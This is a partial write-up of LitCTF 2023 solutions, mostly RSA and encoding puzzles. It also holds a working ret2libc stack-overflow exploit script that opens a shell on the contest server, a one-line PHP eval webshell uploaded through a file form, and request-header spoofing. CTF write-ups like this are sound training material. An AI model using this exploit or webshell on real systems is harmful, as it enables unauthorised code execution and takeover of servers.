LitCTF 2023 partial writeup
LitCTF 2023
PWN
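Just nc it~ (只需要nc一下~)
The flag in the root directory is fake; the real one is in the environment variables.
Mental arithmetic cards (口算题卡)
Simple arithmetic questions.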
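import pwn
io = pwn.remote("node5.anna.nssctf.cn", 28364)
while True:
    rec = io.recvline()
    print(rec.decode())
    if b"?" in rec:
        # Tokens 2..4 of the question line are joined into one arithmetic expression
        tokens = rec.decode().replace('?', '').split()
        # eval() executes whatever text the server sends; tolerable only against a trusted CTF host
        result = eval(''.join(tokens[2:5]))
        data = str(result).encode()
        io.sendline(data)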
Wait for the script to error out and you have the flag.
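The solver above hands server-supplied text to eval(). As an added example (not code from the original writeup), the same answers can be computed through an AST allow-list that rejects anything but integer arithmetic. The names safe_arith and answer are hypothetical, and the prompt lines are constructed because the page does not show the server's wording.

```python
import ast
import operator

# Only plain integer arithmetic is allowed; every other node type is rejected.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv,
}


def safe_arith(expr: str) -> int:
    """Evaluate an integer arithmetic expression without calling eval()."""

    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"disallowed expression element: {type(node).__name__}")

    return walk(ast.parse(expr, mode="eval").body)


def answer(line: str) -> str:
    """Take tokens 2..4 of a prompt line, as the solver above does, and answer it."""
    tokens = line.replace("?", "").split()
    return str(safe_arith("".join(tokens[2:5])))


# Constructed prompt lines (assumed format, not captured from the real service).
SAMPLE_OK = "What is 12 + 30 ?"
SAMPLE_HOSTILE = "What is __import__('os').getpid() + 1 ?"

if __name__ == "__main__":
    print(answer(SAMPLE_OK))
    try:
        answer(SAMPLE_HOSTILE)
    except ValueError as exc:
        print("rejected:", exc)
```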
Overflow it hard~ (狠狠的溢出涅~)
Basic stack overflow.
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = remote('node5.anna.nssctf.cn',28494)
pwnfile='./pwn4'
elf = ELF(pwnfile)
libc_file_path = './libc-2.31.so'
libc = ELF(libc_file_path)
padding = 0x67
leak_fun_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_addr = 0x4007d3
main = elf.symbols['main']
ret_addr = 0x0000000000400556
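# Stage 1: the ROP chain calls puts(puts@got) to leak a libc address, then returns to main
io.recvuntil(b'Leave your message:')
payload = b'\0' + b'a'*padding + p64(pop_rdi_addr) + p64(leak_fun_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
io.recvuntil(b'Ok,Message Received\n')
# The leaked pointer arrives as 6 bytes; pad it to 8 before unpacking
puts_addr=u64(io.recv(6).ljust(8,b'\x00'))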
print(hex(puts_addr))
io.recvuntil(b"Leave your message:")
# Stage 2: rebase libc from the leak, then resolve system() and "/bin/sh"
puts_offset = libc.symbols['puts']
libc_addr = puts_addr - puts_offset
print('libc_addr:',hex(libc_addr))
system_offset = libc.symbols['system']
system_addr = libc_addr + system_offset
print('system_addr',hex(system_addr))
bin_sh_offset = next(libc.search(b'/bin/sh'))
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr',hex(bin_sh_addr))
# The extra ret gadget (ret_addr) realigns the stack to 16 bytes before system() runs
payload2 = b'\0' + b'a'*padding + p64(ret_addr) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
io.sendline(payload2)
io.recvuntil(b'Ok,Message Received')
io.interactive()
Reverse
The best programmer in the world (世界上最棒的程序员)
Open the binary in IDA and press Shift+F12 to search the strings, which gives the flag: LitCTF{I_am_the_best_programmer_ever}
CRYPTO
Hex?Hex!
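Decode the hex to get the flag: LitCTF{tai111coollaaa!}
Dreams are red (梦想是红色的)
Decode the Core Socialist Values encoding to get the flag: LitCTF{为之则易,不为则难}
So you play Genshin Impact too (原来你也玩原神)
Teyvat script.
Match the glyphs against the script to get the flag: LITCTF{YUANLAINIYEWANYUANSHENWWW}
Folks, who gets it? Can't even do the RSA sign-in (家人们!谁懂啊,RSA签到都不会)
p, q, e and c are all given; this is the most basic RSA there is!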
from Crypto.Util.number import *
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
e = 65537
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
n=p*q
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}'
factordb
Factor n with the online service http://factordb.com/
from Crypto.Util.number import *
e = 65537
n = 87924348264132406875276140514499937145050893665602592992418171647042491658461
c = 87677652386897749300638591365341016390128692783949277305987828177045932576708
p=275127860351348928173285174381581152299
q=319576316814478949870590164193048041239
n=p*q
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{factordb!!!}'
P_Leak
dp leak
import gmpy2
import libnum
e= 65537
dp= 5892502924236878675675338970704766304539618343869489297045857272605067962848952532606770917225218534430490745895652561015493032055636004130931491316020329
n= 50612159190225619689404794427464916374543237300894011803225784470008992781409447214236779975896311093686413491163221778479739252804271270231391599602217675895446538524670610623369953168412236472302812808639218392319634397138871387898452935081756580084070333246950840091192420542761507705395568904875746222477
c= 39257649468514605476432946851710016346016992413796229928386230062780829495844059368939749930876895443279723032641876662714088329296631207594999580050131450251288839714711436117326769029649419789323982613380617840218087161435260837263996287628129307328857086987521821533565738409794866606381789730458247531619
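# Method 1: e*dp ≡ 1 (mod p-1), so 2**(e*dp) ≡ 2 (mod p) and the gcd exposes p
p=gmpy2.gcd(pow(2,e*dp,n)-2,n)
#print(p)
# Method 2: e*dp - 1 = k*(p-1) for some k in [1, e); try every k
for i in range(1, e):
    p = (dp * e - 1) // i + 1
    if n % p == 0:
        q = n // p
        print(p)
        break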
phi_n = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
#print(m)
flag = libnum.n2s(int(m))
print(flag)
#b'LitCTF{Prim3_1s_Le@k!!!!!}'
yafu
n is a product of multiple primes
# sagemath9.3
import gmpy2
import libnum
n = 15241208217768849887180010139590210767831431018204645415681695749294131435566140166245881287131522331092026252879324931622292179726764214435307
c = 12608550100856399369399391849907846147170257754920996952259023159548789970041433744454761458030776176806265496305629236559551086998780836655717
e = 65537
phi = euler_phi(n)
d = gmpy2.invert(e, phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
#b'LitCTF{Mu1tiple_3m4ll_prim5_fac7ors_@re_uns4f5}'
The lore of e (e的学问)
e and phi are not coprime
import gmpy2
import libnum
e=74
p= 86053582917386343422567174764040471033234388106968488834872953625339458483149
q= 72031998384560188060716696553519973198388628004850270102102972862328770104493
c= 3939634105073614197573473825268995321781553470182462454724181094897309933627076266632153551522332244941496491385911139566998817961371516587764621395810123
n = p * q
phi = (p - 1) * (q - 1)
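t = gmpy2.gcd(e, phi)  # common factor of e and phi
t1 = e // t  # remaining exponent; invert() below needs gcd(t1, phi) == 1
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)  # equals m**t mod n
#print(mt1)
# An integer root recovers m only because m**t is smaller than n here
m, exact = gmpy2.iroot(mt1, t)
print(libnum.n2s(int(m)))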
#b'LitCTF{e_1s_n0t_@_Prime}'
The same common divisor
XOR gives n2; the greatest common divisor then gives p
import gmpy2
from Crypto.Util.number import *
n1= 9852079772293301283705208653824307027320071498525390578148444258198605733768947108049676831872672654449631852459503049139275329796717506126689710613873813880735666507857022786447784753088176997374711523987152412069255685005264853118880922539048290400078105858759506186417678959028622484823376958194324034590514104266608644398160457382895380141070373685334979803658172378382884352616985632157233900719194944197689860219335238499593658894630966428723660931647038577670614850305719449893199713589368780231046895222526070730152875112477675102652862254926169713030701937231206405968412044029177246460558028793385980934233
n3= 4940268030889181135441311597961813780480775970170156650560367030148383674257975796516865571557828263935532335958510269356443566533284856608454193676600884849913964971291145182724888816164723930966472329604608512023988191536173112847915884014445539739070437180314205284883149421228744714989392788108329929896637182055266508625177260492776962915873036873839946591259443753924970795669864031580632650140641456386202636466624658715315856453572441182758855085077441336516178544978457053552156714181607801760605521338788424464551796638531143900048375037218585999440622490119344971822707261432953755569507740550277088437182
c1= 7066425618980522033304943700150361912772559890076173881522840300333719222157667104461410726444725540513601550570478331917063911791020088865705346188662290524599499769112250751103647749860198318955619903728724860941709527724500004142950768744200491448875522031555564384426372047270359602780292587644737898593450148108629904854675417943165292922990980758572264063039172969633878015560735737699147707712154627358077477591293746136250207139049702201052305840453700782016480965369600667516646007546442708862429431724013679189842300429421340122052682391471347471758814138218632022564279296594279507382548264409296929401260
c2= 854668035897095127498890630660344701894030345838998465420605524714323454298819946231147930930739944351187708040037822108105697983018529921300277486094149269105712677374751164879455815185393395371001495146490416978221501351569800028842842393448555836910486037183218754013655794027528039329299851644787006463456162952383099752894635657833907958930587328480492546831654755627949756658554724024525108575961076341962292900510328611128404001877137799465932130220386963518903892403159969133882215092783063943679288192557384595152566356483424061922742307738886179947575613661171671781544283180451958232826666741028590085269
n2=n3^n1
#print(n2)
n2=13275392358603749049507302824073643158313511157306042129424622043169404438475070367199888792522735816696831092853554043588044629442339762181808939836068784930395387656511731023773900700005021564847480224798180592959510217158765133918150651706674329603149481255390797032771700235015269257730220757739489147426447858665350504461218790022992177725157756735193197648927044824616697206813752794351736481372892433605669363455272775767270738838271685683788851792503697508906872616175734362549442203442409947760416740297996886756365560632301306250478012961270642177511142736084877917270911656025730517314096773424314000497639
#n1=p*q1
#n2=p*q2
e=65537
p=gmpy2.gcd(n1,n2)
print(p)
p=94719927424407179559097379278598331426219665736925758883356208017201441609501349561869578255304543730077703898951251809509592215259248796747648789953238424438984058591393245455685873538467037385791128865102181068065167783963401976811367747317190298098904229431166441000923777869516488107339457633589707290103
q1=n1//p
q2=n2//p
#print(q1)
#print(q2)
q1=104012746210726545705789680691248566382853251133910236876038243437510784296184196320187187776771363313166977867406958719259028396635722258334573345243161167030007959006868509236262881011540625146091222223682904331888044825914279348316425931489349069836351221018235923860976755930087781234656707865421500657711
q2=140154165227780581817015412082229118072371342128693010186891822616849522057349369186199500975076779426764856972311311333961841158076064234038041826391087014159076192469954228505640491716233302330334060905669918673768242449100688363703222166887094608525930824967584107227414453993053284049888979769641293172113
phi1=(q1-1)*(p-1)
phi2=(q2-1)*(p-1)
d1=inverse(e,phi1)
d2=inverse(e,phi2)
m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1))
print(long_to_bytes(m2))
#b'LitCTF{TH3_Tw0_nUmb3rs_H@v3_The_sAme_D1v1s0r!!}'
#b'LitCTF{TH3_Tw0_nUmb3rs_H@v3_The_sAme_D1v1s0r!!}'
easy_math
from Crypto.Util.number import *
from secret import flag
m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q = getPrime(128)
n = p*q
hint = p**3-q**5
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint = {hint}')
'''
n = 2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
c = 2168563038335029902089976057856861885635845445863841607485310134441400500612435296818745930370268060353437465666224400129105788787423156958336380480503762222278722770240792709450637433509537280
hint = 392490868359411675557103683163021977774935163924606169241731307258226973701652855448542714274348304997416149742779376023311152228735117186027560227613656229190807480010615064372521942836446425717660375242197759811804760170129768647414717571386950790115746414735411766002368288743086845078803312201707960465419405926186622999423245762570917629351110970429987377475979058821154568001902541710817731089463915930932142007312230897818177067675996751110894377356758932
'''
q has to be recovered from hint
n=p*q
hint=p**3-q**5
p=n/q
n**3/q**3-q**5=hint
n**3=hint*q**3+q**8
# sagemath9.3
n=2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
hint=392490868359411675557103683163021977774935163924606169241731307258226973701652855448542714274348304997416149742779376023311152228735117186027560227613656229190807480010615064372521942836446425717660375242197759811804760170129768647414717571386950790115746414735411766002368288743086845078803312201707960465419405926186622999423245762570917629351110970429987377475979058821154568001902541710817731089463915930932142007312230897818177067675996751110894377356758932
q = var('q')  # declare q as the symbolic unknown
solve(n^3 == hint*q^3+q^8, q)
# [q == 304683618109085947723284393392507415311]
from Crypto.Util.number import *
q=304683618109085947723284393392507415311
n = 2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
c = 2168563038335029902089976057856861885635845445863841607485310134441400500612435296818745930370268060353437465666224400129105788787423156958336380480503762222278722770240792709450637433509537280
p=n//q  # integer division; n/q would produce a float in Python 3
e = 65537
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{f9fab7522253e44b48824e914d0801ba}'
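The equation n**3 = hint*q**3 + q**8 derived above can also be solved without SageMath: for hint > 0 the right-hand side grows strictly with q, so integer bisection finds the single positive root. This is an added example, not the author's code; recover_q, decrypt and demo are hypothetical names, and the toy primes in demo are constructed rather than taken from the challenge.

```python
def recover_q(n: int, hint: int, q_bits: int = 128) -> int:
    """Solve q**8 + hint*q**3 == n**3 for the integer q by bisection.

    With hint > 0 the left-hand side is strictly increasing in q, so there is
    at most one positive root and binary search lands on it exactly.
    """
    if hint <= 0:
        raise ValueError("monotonicity argument needs hint > 0 (p**3 > q**5)")
    target = n ** 3
    lo, hi = 1, 1 << q_bits
    while lo <= hi:
        mid = (lo + hi) // 2
        value = mid ** 8 + hint * mid ** 3
        if value == target:
            if n % mid:
                raise ValueError("root does not divide n")
            return mid
        if value < target:
            lo = mid + 1
        else:
            hi = mid - 1
    raise ValueError("no integer root below 2**q_bits")


def decrypt(n: int, e: int, c: int, q: int) -> int:
    """Textbook RSA decryption once one prime factor is known."""
    p = n // q
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, n)


def demo():
    # Constructed toy parameters, not the challenge's values.
    p, q, e = 1000003, 101, 65537
    n, hint = p * q, p ** 3 - q ** 5
    m = int.from_bytes(b"hi!", "big")
    c = pow(m, e, n)
    found = recover_q(n, hint, q_bits=16)
    return found, decrypt(n, e, c, found).to_bytes(3, "big")


if __name__ == "__main__":
    print(demo())
```

For the challenge itself, call recover_q(n, hint) with the default 128-bit bound, matching q = getPrime(128) in the generator script.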
Is this only base?
Rail fence 23 -> base64 -> Caesar 23
Euler
Euler's theorem exponent reduction
import gmpy2
from Crypto.Util.number import *
c = 406480424882876909664869928877322864482740577681292497936198951316587691545267772748204383995815523935005725558478033908575228532559165174398668885819826720515607326399097899572022020453298441
m=gmpy2.iroot(c,2)[0]
print(long_to_bytes(m))
#LitCTF{a1a8887793acfc199182a649e905daab}
You are my keyword (你是我的关键词, Keyworld)
Challenge description: YOU are my keworld
YOU is the key
This gives the flag: LITCTF{Y0U_AR3_MY_KEYW0RD}
MISC
What_1s_BASE
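Base64-decode to get the flag: LitCTF{KFC_Cr4zy_Thur3day_V_me_50}
Take me hand
Follow the TCP stream; stream 1 shows flag=LitCTF%7BGive_y0ur_hand_to_me%21%21%21_plz%7D
Do you like my archive? (喜欢我的压缩包么)
Brute-forcing gives the password: 114514
This yields the flag image
Why is there only half a shuttlecock? (annoyed) (这羽毛球怎么只有一半啊(恼))
Changing the image height reveals the flag image
Damaged image (破损的图片)
Repairing the first eight bytes of the file header gives the flag image
[Minecraft] Have fun~~~ (【Minecraft】玩的开心~~~)
Trade diamonds with a villager for the flag book
ssvvgg
Open it in 010 Editor: it holds a Base64-encoded JPG image; extract it
The steghide passphrase is 6 digits; brute-force it with stegseek
This gives the flag: LitCTF{svg?_base642png!&steghide!}
Secret of the snowy mountain (雪山的秘密)
Nearly 3 minutes of Morse code; decode it directly with the online tool https://morsecode.world/international/decoder/audio-decoder-adaptive.html
Result: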
3.2-..3-.23-.32-32.-3..-/..2-223-.32-322-..3-..2-/2.2-3..-232-223BT..2-.32-/3.2-..3-.23-3.3-..3-/.32-32.-322-.3.-/.3.-33.-22.-23.-..3-.23-..2-SM..-/.2.-..3-IO.2-3..NUAK23-/23.-.33-.32-2.2-3..-/3.2-2J3-322-332-3..-233
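Searching for this on Baidu shows it is the Genshin Impact Easter egg, the snow mountain code
A closer look shows it is identical, so that settles it: just replace the spaces with _
This gives the flag: NSSCTF{FOR_THE_NATION_WE_CANT_FORGO_THIS_SKYBORNE_POWER_BUT_WE_FAILED}
The Two Forms beget the Four Symbols (两仪生四象)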
keylist={"乾": "111", "兑": "011", "离": "101", "震": "001", "巽": "110", "坎": "010", "艮": "100", "坤": "000"}
encoded_text = "坤 乾 兑 艮 兑 坎 坤 坤 巽 震 坤 巽 震 艮 兑 坎 坤 震 兑 乾 坤 巽 坤 艮 兑 震 巽 坤 巽 艮 坤 巽 艮 艮 兑 兑 艮 震 兑 乾 坤 乾 坤 坤 兑 艮 艮 坤 巽 坤 坤 巽 坎 坤 兑 离 坎 震 艮 兑 坤 巽 坎 艮 兑 震 坤 震 兑 乾 坤 乾 坎 坤 兑 坎 坤 震 艮 离 坤 离 乾 艮 震 艮 巽 震 离 震 坤 巽 兑 艮 兑 坎 坤 震 巽 艮 坤 离 乾 艮 坎 离 坤 震 巽 坎 坤 兑 坤 艮 兑 震 巽 震 巽 坎 坤 巽 坤 艮 兑 兑 坎 震 巽 兑"
keys = encoded_text.split()
decode_text = []
for key in keys:
    decode_text.append(keylist.get(key))
result = ''.join(decode_text)
print(result)
flag = ''
res=''
for i in range(len(result)):
    res += result[i]
    if (i+1) % 10 == 0:
        flag += chr(int(res,2))
        res = ''
print("LitCTF{"+flag+"}")
#LitCTF{wh1ch_ag4in_pr0duced_the_3ight_Tr1grams}
easy_shark
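The archive uses pseudo-encryption; in the capture, following TCP stream 57 gives the key and the flag ciphertext
x has two solutions, 17 and 77; presumably an affine cipher
Flag format: NSSCTF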
NSSCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}
WEB
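For all of the web challenges, see my teammate's writeup: https://c4skg.top/C4skg/34bb0543.html
Where's my flag? (我Flag呢?)
View the page source to get the flag: NSSCTF{52112e92-e3eb-4b96-96ff-66171412260c}
Missile Maze (导弹迷踪)
The flag is in game.js
Follow me and hack me
Just pass the values as requested
The backup belongs to the Easter egg challenge: request www.zip, and index.php.bak from the extracted archive contains Easter egg 3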
<?php
// The third Easter egg! (Have you seen Ready Player One?)
// _R3ady_Pl4yer_000ne_ (3/?)
?>
PHP is the best language in the world!! (PHP是世界上最好的语言!!)
Command execution
1zjs
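Request index.umd.js to find the comment /f@k3f1ag.php
The page is full of JSFuck; just paste it into the console
Homework management system (作业管理系统)
The page source reveals the default account: admin admin
After logging in there is a file upload area; upload a one-line webshell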
<?php @eval($_POST['cmd']);?>
Once the upload succeeds, connect with AntSword
The flag is in the root directory: NSSCTF{7cbf9f60-da45-4625-84fa-f02a1f7cdd32}
Http pro max plus
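Intercept and modify the request, following the hints step by step:
Client-IP: 127.0.0.1 # access from the local machine
Referer: pornhub.com # come from pornhub.com
User-Agent: Chrome # use the Chrome browser
Via: Clash.win # use the Clash.win proxy
Request wtfwtfwtfwtf.php
Finally request sejishikong.php
This gives the flag: NSSCTF{e5581f96-b583-40a5-b53d-bbb5c59dcf93}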